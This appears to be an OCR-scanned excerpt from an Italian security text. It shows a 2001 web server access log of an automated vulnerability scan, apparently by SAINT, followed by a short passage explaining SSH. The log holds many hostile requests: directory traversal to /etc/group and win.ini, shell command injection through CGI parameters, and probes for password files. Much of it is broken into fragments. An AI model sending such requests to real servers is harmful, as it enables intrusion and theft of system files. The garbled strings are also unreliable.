69warp87.newtel.com [14 /Aug/ 2001: 13 -.08:14 -0400] "GET 

/_vtl_bin/_vtl_aut/Dvwssr . dll HTTP/1 
69warp87.newtel.com - - [14/Aug/2001 
HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 14 -0400] 

HTTP/1.0" 401 468 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 15 
/servlet/com. llvesoftware . jrun .plugins . ssl . SSIFllter/ . . / 
/../../. ./wlnnt/wln. Ini HTTP/1.0" 400 413 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 15 -0400] 

/servlet/com. llvesoftware . jrun . plugins . ss! . SSIFllter/ . . / 
/../../.. /etc/group HTTP/1.0" 400 409 
69warp87.newtel.com - - [14/ Aug/ 2001 : 13 : 08 : 15 
/_vti_pvt/service.pwd HTTP/1.0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 15 
/_vti_pvt/users.pwd HTTP/1.0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 16 
/_vti_pvt/authors.pwd HTTP/1.0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 16 
/_vtl_pvt/administrators.pwd HTTP/1.0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 16 
HTTP/1 .0" 400 370 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 16 
HTTP/1 .0" 400 370 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 17 
/msadc/msadcs . dll/ActlveDataFactory . Query HTTP/1 .0" 401 
468 



GET /cgi-bin/pi 
GET /cgl-bin/post- 
GET /cgi- 

GET /cgi- 
GET /globals.pl 
0400] "GET /process_bug . cgl 
"GET 
"GET 
"GET 



,0" 401 468 
■13:08:14 -0400] 



"GET //WEB— INF/ 
"GET /./WEB-INF/web.xml 



-0400] "GET 



/. ./. 



"GET 



/. ./. 



0400] 


"GET 


0400] 


"GET 


0400] 


"GET 


0400] 


"GET 


0400] 


"PUT / saint.txt 


0400] 


"PUT /cgi-bln/ saint 


0400] 


"GET 



69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 17 -0400] 

468 

69warp87.newtel.com [14 /Aug/ '2001: 13: 08: 17 -0400] 

HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 17 -0400] 

468 



"GET / HTTP/ 1.0" 401 



"GET /?wp-cs-dump 



"INDEX / HTTP/ 1.0" 401 
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69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 18 -0400] 

/ exec /show/ con fig/cr HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 18 -0400] 

468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 18 -0400] 

/pls/admln_/ gateway.htm HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 19 -0400] 

/_ncl_subjects . shtml HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 19 -0400] 

HTTP/1.0" 401 468 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 05 -0400] 
/scripts/. . %cl%lc. ./. . %cl%lc. . /mssql7/install/pubtext 
+c:+. exe HTTP/1 .0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13: 09: 05 -0400] 

/."./.". /wlnnt/wln.±nl%20.php3 HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 05 -0400] 

HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13: 09: 06 -0400] 

bln/search.pl HTTP/1.0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 06 -0400] 
/.nsf/. . /wlnnt /win.ini HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 38 -0400] 

/n0nexi5tent_ file. html HTTP/1.0" 404 287 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 38 -0400] 

Zn0nexi5tent_file.html HTTP/1.0" 404 287 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 38 -0400] 

8883 

69warp87.newtel.com [14/Aug/2001 : 13 : 09:39 -0400] 

/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group 
HTTP/1 .0" 400 372 

69warp87.newtel.com [14 /Aug/2001 -.13:09:39 -0400] 

/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win . ini 

HTTP/ 1.0" 400 

376 

69warp87.newtel.com [14/ Aug/2001 :13 :09 :39 -0400] 

/../../../../. ./etc/group HTTP/1.0" 400 352 

69warp87.newtel.com [14/ Aug/2001 :13 :09 : 40 -0400] 

/../../../../. ./winnt/win. ini HTTP/1.0" 400 356 

69warp87.newtel.com [14 /Aug/2001 : 13 : 09 : 40 -0400] 

/../../../../. .winnt/win. ini HTTP/1.0" 400 355 
69warp87.newtel.com - - [14/ Aug/2001 :13 :09 : 40 -0400] 
/.../.../.../.../... /etc/group HTTP/1 .0" 404 295 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 40 -0400] 
/.../.../.../.../.. ./winnt/win. ini HTTP/1.0" 404 299 

69warp87.newtel.com [14/ Aug/2001 :13 :09 : 41 -0400] 

/../../../../. ./etc/group HTTP/1.0" 400 352 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 41 -0400] 
/../../../../. ./winnt/win. ini HTTP/1.0" 400 356 
69warp87.newtel.com - - [14/ Aug/2001 :13 :09 : 41 -0400] 
bin/webdist . cgi ?distloc=; /bin/cat %20/etc/group 
HTTP/ 1.0" 40 
4 285 

69warp87.newtel.com [14/Aug/2001 : 13 : 09:42 -0400] 

bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 280 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 42 -0400] 

bin/htmlscript? . ./../../../../. . /etc/group 

HTTP/1.0" 404 28 

4 

69warp87.newtel.com - - [14/ Aug/2001 :13 :09 : 42 -0400] 
bin/php. cgi? /etc/group HTTP/ 1.0" 404 281 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 42 -0400] 
bin/pfdispaly? . ./../../../../. . /etc/group 
HTTP/1 .0" 404 283 

69warp87.newtel.com [14 /Aug/2001 : 13 : 09 : 43 -0400] 

bin/pfdispaly . cgi? . ./../../../../. . /etc/group 
HTTP/1.0" 404 



'GET 

'GET /pls HTTP/1.0" 401 

'GET 

'GET 

'GET /ncl_subjects .html 
'GET 

bat"+&+dir 
'GET 

'GET /global . asp \ 

'POST /cgi- 

'GET 

'GET 

'GET 

'GET / HTTP/1.0" 200 
'GET 

'GET 

'GET 
'GET 
'GET 
'GET 
'GET 
'GET 
'GET 

'GET /cgi- 

'GET /cgi- 
'GET /cgi- 

'GET /cgi- 
'GET /cgi- 

'GET /cgi- 
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69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 43 -0400] "GET /cgi-bln/vlew- 
source? . ./../../../../. . /etc/group 
HTTP/1 .0" 404 2 
85 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 43 -0400] "GET /cgl- 

bln/htsearch?exclude=%60/etc/group%60 HTTP/1.0" 404 

282 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 43 -0400] "GET 

/cgl-bln/infosrch. cgl?cmd=getdoc&db=man&fname= / /bln/cat%20/etc/g 
roup HTTP/1.0" 404 286 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 44 -0400] "GET /cgi- 
bln/faxsurvey?/bln/cat%20/etc/group HTTP/1.0" 404 283 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 44 -0400] "GET /cgl- 

bin/counterf±glet/nc/f=; cat%20 /etc/group 
HTTP/1.0" 404 308 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 44 -0400] "GET /cgi- 

bln/calendar_admln . pi ?conflg= / cat %20 /etc/group / 
HTTP/1 .0" 4 
04 291 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 44 -0400] "GET 
/cgl-bln/calendar/calendar_admln . pl?conflg= / cat%20/etc/group / HT 
TP/1.0" 404 300 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 45 -0400] "GET 

/cg±-bln/poll±t/Poll_It_SSI_v2 . 0 . cgl ?data_dlr=/etc/group%00 HTTP 
/1.0" 404 301 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 45 -0400] "GET 
/cgl-bln/bb-hostsvc . sh?HOSTSVC=/ . ./../../../../../../. . /etc/grou 
p HTTP/1.0" 404 287 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 45 -0400] "GET 

/cgl-bln/netauth. cgl?cmd=showSpage=. ./../../../../../../../. ./et 
c/group HTTP/ 1.0" 404 285 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 46 -0400] "GET /cgl- 

bln/htgrep?flle=lndex.html&hdr=/etc/group 
HTTP/1.0" 404 280 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 46 -0400] "GET 
/cgi-bln/YaBB .pl?board=news&actlon=dlsplay&num= . ./. ./. ./. ./. ./. . 
/../.. /etc/group%00 HTTP/1.0" 404 281 

69warp87.newtel.com [14/Aug/2001 : : 13 : 09:46 -0400] "GET 

/search97cgi/vtopic?actlon=vlew&ViewTemplate= . ./. ./. ./. ./. . Zete/ 
group HTTP/1.0" 404 284 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 46 -0400] "GET /egi- 

bln/multihtml .pi ?mult±=/etc/group%00html 
HTTP/1 .0" 404 286 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 47 -0400] "GET /cgl- 

bln/query?mss= . . /conflg HTTP/1.0" 404 279 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 47 -0400] "GET /cgl- 

bln/ssl//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group 
HTTP/ 1.0" 40 
0 378 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 47 -0400] "GET /cgl- 

bln/webplus?script=/ . ./. ./. ./. . /etc/group 
HTTP/1 .0" 404 281 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 47 -0400] "GET /egi- 

bln/webplus . exe?scrlpt=/ . ./. ./. ./. . /etc/group 
HTTP/1.0" 404 
285 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 48 -0400] "GET /egi- 

bin/webplus . cgl ?script=/ . . / . . / . . / . . /etc/group 
HTTP/1.0" 404 
285 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 48 -0400] "GET 

/cgl-bln/mmstdod. egi ?ALTERNATE_TEMPLATES= / %2 0echo%2 OContent—Type 
:%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 HTTP/1.0" 404 285 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 48 -0400] "GET /cgl- 

bin/bbs_forum. cgl?read= . ./. ./. ./. . /etc/group 
HTTP/1.0" 404 
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69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 48 -0400] "GET /cgi- 

bln/bbs/bbs_forum.cgl?read=. ./. ./. ./. . /etc/group 
HTTP/1 . 0 " 
404 291 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 49 -0400] "GET /cgi-bin/man- 
cgl?%20/etc/group%20 HTTP/1.0" 404 281 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 49 -0400] "GET 

/opendir .php?requesturl=/etc/group HTTP/1 . 0" 404 277 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 49 -0400] "GET 

/bb_smllles . php ?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi 4 
vZXRjL2dyb3VwAAo HTTP/1.0" 404 280 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 49 -0400] "GET 
/cgl-bln/talkback.cgl?artlcle=. ./. ./. ./. ./. . /etc/group%00&act±on 
=vlewSmatchvlew=l HTTP/1.0" 404 286 

69warp87.newtel.com [14/Aug/2001 : 13 : 09 : 50 -0400] "GET /cgi- 

bin/cal_make.pl?pO=. ./../../../. . /etc/group%00 
HTTP/ 1.0" 40 
4 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 50 -0400] "GET 
/cgl-bln/alstats/aldlsp3 . cgl? . ./. ./. ./. ./. ./. ./. ./etc/group HTTP 
/1.0" 404 293 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 50 
HTTP/1 .0" 403 286 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 50 
bin/ dumpenv.pl HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 51 
cgl HTTP/1.0" 404 286 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 51 
bin/wwwboard . pi HTTP/1.0" 404 285 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 51 
bin/wwwboard . cgl HTTP/1.0" 404 286 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 54 
HTTP/1 .0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 55 
HTTP/1.0" 404 278 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 55 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 55 
HTTP/1 .0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 55 
HTTP/1 .0" 404 280 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 56 
HTTP/1 .0" 404 283 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 56 
bin/ finger .cgl HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 56 
HTTP/1 . 0 " 302 291 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 56 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 57 
HTTP/1 .0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 57 
bin/textcounter.pl HTTP/1.0" 404 288 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 57 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 57 
HTTP/1 .0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 58 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 58 
HTTP/1.0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 58 
bin/websendmail HTTP/1.0" 404 285 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 58 
HTTP/1.0" 404 276 

59warp87.newtel.com - - [14/Aug/2001 : 13 : 09 : 59 



0400] 


"GET 


/cgi -bin/t est-cgi 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi-bin/nph-test- 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi -bin/wwwboard 


0400] 


"GET 


/cgi -bin/wrap 


0400] 


"GET 


/cgi -bin/wrap . pi 


0400] 


"GET 


/ cgi-bin/wrap . cgi 


0400] 


"GET 


/cgi -bin/ finger 


0400] 


"GET 


/cgi -bin/ finger . pi 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi -bin/phf 


0400] 


"GET 


/cgi -bin/handler 


0400] 


"GET 


/cgi -bin/info2www 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi -bin/gl impse 


0400] 


"GET 


/cgi -bin/aglimpse 


0400] 


"GET 


/cgi -bin/webgai s 


0400] 


"GET 


/cgi -bin/www-sql 


0400] 


"GET 


/cgi- 


0400] 


"GET 


/cgi-bin/jj 


0400] 


"GET 


/ cgi-bin/ count . cgi 
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[1 4/Aug/2001 : 13: 09: 59 
0" 404 286 

[1 4/Aug/2001 : 13: 09: 59 



[14/Aug/2001 
0" 400 - 



13:09:59 



69warp87 . newtel . com - - 
bin/imagemap . exe HTTP/1 
69warp87 . newtel . com - - 
404 273 

69warp87 . newtel . com - - 
bln/salnt_test_cgl HTTP/1 
69warp87 . newtel . com 
HTTP/1 .0" 404 277 
69warp87 . newtel . com 
HTTP/1.0" 404 278 
69warp87 . newtel . com 
HTTP/1 .0" 404 277 
69warp87 . newtel . com 
HTTP/1 .0" 404 277 
69warp87 . newtel . com 
HTTP/1 .0" 404 277 
69warp87 . newtel . com 
HTTP/1 .0" 404 276 
69warp87 . newtel . com 
HTTP/1.0" 404 278 
69warp87 . newtel . com 
HTTP/1 .0" 404 282 
69warp87 . newtel . com 
HTTP/1.0" 404 278 
69warp87 . newtel . com 

win/uploader . exe HTTP/1.0" 404 286 
69warp87 . newtel . com 
HTTP/1.0" 404 282 
69warp87 . newtel . com 
HTTP/1 .0" 404 282 
69warp87 . newtel . com 
sample . exe HTTP/1 . 0 
69warp87 . newtel . com 
HTTP/1 .0" 404 282 
69warp87 . newtel . com 
HTTP/1.0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 04 
/ script s/ c32web . exe/ChangeAdmlnPassword HTTP/1 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 04 
/pccsmysqladm/lncs/dbconnect . ine HTTP/1 . 0 " 404 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 04 
/servlet/sunexamples . BBoardServlet HTTP/1 .0" 4 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 04 
/ _pr ivate /shopplng_cart .mdb HTTP/1.0" 404 292 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 05 
/piranha/ secure/passwd.php3 HTTP/1.0" 404 292 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 05 
/scripts/cart32 . exe/cart32clientlist HTTP/1 . 0 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 05 
/scripts/emurl/RECMAN.dll HTTP/1.0" 404 290 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 05 
bin/guestbook.cgi HTTP/1.0" 404 287 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 06 
bin/ guestbook. pi HTTP/1 
69warp87 . newtel . com - - 
HTTP/1.0" 404 280 
69warp87 . newtel . com 

/site/eg/source.asp HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 
msql/ index. html HTTP/1.0" 404 292 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 07 
bin/wais/wais.pl HTTP/1.0" 404 286 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 
/ddrint /bin/ ddicgi.exe HTTP/1.0" 404 287 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 08 



[1 4/Aug/2001 : 13: 10: 00 

[1 4/Aug/2001 : 13: 10: 00 

[1 4/Aug/2001 : 13: 10: 00 

[1 4/Aug/2001 : 13: 10: 01 

[1 4/Aug/2001 : 13: 10: 01 

[1 4/Aug/2001 : 13: 10: 01 

[1 4/Aug/2001 : 13: 10: 01 

[1 4/Aug/2001 : 13: 10: 02 

[1 4/Aug/2001 : 13: 10: 02 

[1 4/Aug/2001 : 13: 10: 02 
0" 404 286 
[14/Aug/2001: 13 :10:02 

[14/Aug/2001:13:10:03 

[14/Aug/2001:13:10:03 

■' 404 290 

[14/Aug/2001: 13 :10:03 

[14/Aug/2001:13:10:03 



-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 
-0400 



404 



-0400 

0" 
-0400 

297 
-0400 
04 299 
-0400 



.0" 404 286 
[1 4/Aug/2001 : 13: 10: 06 



- [14/Aug/2001:13:10:06 - 



07 - 



07 - 



07 - 



"GET /egi- 

"GET /catinfo HTTP/1 . 0 " 
"/egi- 

"GET /egi-bin/esh 
"GET /egi-bin/bash 
"GET /egi-bin/zsh 
"GET /egi-bin/ash 
"GET /egi-bin/ksh 
"GET /egi-bin/sh 
"GET /cgi-bin/perl 
"GET /cgi-bin/perl. exe 
"GET /egi-bin/tesh 
"GET /egi- 

"GET /egi -dos/args . bat 

"GET /egi-dos/args . cmd 

"GET /cgi-shl/win-c- 

"GET / shop/product . asp 

"GET /shop/product . ast 

"GET 
304 
"GET 

"GET 

"GET 

"GET 



-0400 

-0400] "GET 

404 301 

-0400] "GET 

0400] "GET /egi- 

0400] "GET /egi- 

0400] "GET /egi-bin/excite 

0400] "GET 

0400] "GET /cgi-bin/w3- 

0400] "GET /egi-bin/wais .pi 

0400] "GET /egi- 

0400] "GET 

0400] "GET /cgi-bin/db2www 
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69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 08 
bin/db2www.exe HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 08 
/search97cgi/vtoplc HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 11 
HTTP/1.0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 12 
bln/webplus . exe HTTP/1.0" 404 285 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 12 
bln/webplus . cgl HTTP/1.0" 404 285 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 12 
HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 12 
/pbserver/pbserver . dll HTTP/1.0" 404 287 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 13 

bln/statscon flg.pl HTTP/1.0" 404 288 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 13 

HTTP/1 .0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 13 
HTTP/1.0" 404 276 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 13 

query HTTP/1.0" 404 284 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 14 
bin/ncommerce3/Exectiacro/orderdspc . d2w/report 
HTTP/1.0" 404 
315 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 14 -0400] 
bin/websync . exe HTTP/1.0" 404 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 14 -0400] 
HTTP/1 .0" 404 276 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 14 -0400] 
HTTP/1.0" 404 281 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 15 -0400] 
/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 293 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 15 -0400] 
/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 293 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 15 -0400] 
/cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0" 404 305 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 16 -0400] "GET 

/cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0" 404 292 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 16 -0400] 
/cfdocs/snlppets/vlewexample.cfm HTTP/1.0" 404 297 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 16 -0400] 
/CFIDE/Admlnlstrator/startstop.html HTTP/1.0" 404 300 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 16 -0400] "GET 

/iissamples/exair/howitworks/codebrws . asp HTTP/1 . 0" 404 
306 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 17 -0400] "GET 

/iissamples/sdk/asp/docs/codebrws.asp HTTP/1 . 0" 404 302 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 17 -0400] "GET 

/llssamples/exalr/howitworks/code . asp HTTP/1 . 0" 404 302 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 17 -0400] "GET 

/msadc/samples/selector/showcode . asp HTTP/1 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 17 -0400] 
/_vti_bin/_vti_aut/Dvwssr.dll HTTP/1.0" 404 294 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 18 -0400] 
HTTP/1.0" 404 275 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 18 -0400] 

HTTP/1 .0" 404 281 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 18 -0400] 

/servlet/com. livesoftware. jrun . plugins . ss! . SSIFilter/ . . / 
/../../.. /winnt /win.ini HTTP/1.0" 400 414 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 18 -0400] "GÈ 1 

/servlet/com. livesoftware . jrun . plugins . ssi . SSIFilter/ . . / 
/../../.. /etc/group HTTP/1.0" 400 410 
59warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 19 -0400] "GET 



-0400] 


"GET /cai— 


-0400] 


"GET 


-0400] 


"fZ'RT / erri — hi n /w&hn Ine: 


-0400] 


"GET /cai— 


-0400] 


"GET /cai— 


—0400] 


" ' dWP /rìctmj /ht ■/ n /epa rv" , h 


-0400] 


"GET 


-0400] 


"GET /cai— 


-0400] 


"GET /egi-bin/wwwwais 


-0400] 


"GET /egi-bin/pi 


-0400] 


"GET /egi-bin/post- 


-0400] 


"GET /egi- 



"GET /egi- 
"GET / globals.pl 
"GET /process_bug. egi 
"GET 
"GET 
"GET 



"GET 



"GET 



404 301 

"GET 



GET //WEB— INF/ 



"GET /./WEB-INF/web.xml 



"GET 



/. ./. 



/. ./. 
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GET 



"GET 



69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 19 -0400] "GET 

/_vti_pvt/users.pwd HTTP/1.0" 404 284 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 19 -0400] 
/_vti_pvt/authors .pwd HTTP/1.0" 404 286 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 19 -0400] 
/_vtl_pvt/admlnlstrators .pwd HTTP/1.0" 404 293 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 20 -0400] 

HTTP/1 .0" 400 371 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 20 -0400] 

HTTP/1 .0" 400 371 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 20 -0400] 
/msadc/msadcs . dll/ActlveDataFactory . Query HTTP/1 .0" 404 
306 

[14/Aug/2001:13:10:21 -0400] 



"PUT / saint.txt 
"PUT /cgi-bin/ saint.txt 



GET 



GET / HTTP/1.0" 200 

- [14 /Aug/ '2001 :13 : 10:21 -0400] "GET /?wp-cs-dump 

- [14 /Aug/ '2001 :13 :10 :21 -0400] "INDEX / HTTP/1.0" 501 

- [14 /Aug/ 2001 :13 :10 :22 -0400] "GET 



69warp87 . newtel . com - 
8883 

69warp87 . newtel . com - 
HTTP/1 .0" 200 8883 
69warp87 . newtel . com - 
324 

69warp87 . newtel . com - 
/ exec /show/ con fig/cr HTTP/1.0" 404 285 

69warp87.newtel.com [14 /Aug/ 2001 : 13 : 10 : 22 -0400] "GET /pls HTTP/1.0" 404 

269 

69warp87.newtel.com [14 /Aug/ 2001 -.13 -.10:22 -0400] "GET 

/pls /admln_/ gateway.htm HTTP/1.0" 404 288 

69warp87.newtel.com [14/Aug/2001 : 13 : 10 : 22 -0400] "GET 

/_ncl_subjects . shtml HTTP/1.0" 404 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 10 : 23 -0400] "GET /ncl_subjects . html 
HTTP/1 .0" 404 283 

69warp87.newtel.com [14/Aug/2001 : 13 : 11 : 00 -0400] "GET 

/scrlpts/. . %cl%lc. ./. . %cl%lc. . /mssql7 / install/pubtext .bat"+S+dir 
+c:+. exe HTTP/1 .0" 404 333 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 11 : 00 -0400] 
/."./.". /wlnnt/wln.±nl%20.php3 HTTP/1.0" 404 293 

69warp87.newtel.com [14/Aug/2001 : 13 : 11 : 00 -0400] 

HTTP/1 .0" 404 277 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 11 : 01 -0400] 
bln/search.pl HTTP/1.0" 404 283 

69warp87.newtel.com [14/Aug/2001 : 13 : 11 : 01 -0400] "GET 

/.nsf/. ./wlnnt /win.ini HTTP/1.0" 404 279 



"GET 

"GET /global.asp\ 
"POST /cgi- 



69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 
69warp87 . newtel . com 

SSH 



[14 /Aug/ 2001 -.13: 13: 21 -0400] 
[14/Aug/2001:13:13:32 -0400] 
[14 /Aug/ 2001 -.13:13: 44 -0400] 
[14/Aug/2001:13:13:55 -0400] 
[14 /Aug/ 2001 :13 :15 :25 -0400] 
[14/Aug/2001:13:15:36 -0400] 
[14 /Aug/ 2001 -.13 :15 :47 -0400] 
[14/Aug/2001:13:15:50 -0400] 



lì _ 
Il _ 



408 
408 
408 
408 
408 
408 
408 
408 



Secure Shell (SSH) è in pratica un sostituto sicuro di telnet, login o rsh in ambiente Unix. 
Una compressione dei dati viene fornita come opzione è può essere utilizzata insieme a molti 
schemi di autenticazione come SecurID, Kerberos e S/KEY per fornire un accesso remoto 
altamente sicuro a server UNIX. 

I comandi Telnet, rlogin, rcp, rsh hanno parecchi punti deboli quanto a sicurezza: tutte le 
comunicazioni sono in chiaro e nessuna autenticazione viene svolta dalla macchina. 
Questi comandi sono suscettibili di intercettazione e allo spoofing dell'indirizzo IP. 
SSH protegge da: 



Intercettazione di dati trasmessi tramite la rete. 
Manipolazione di dati negli elementi intermedi della rete (come i router). 
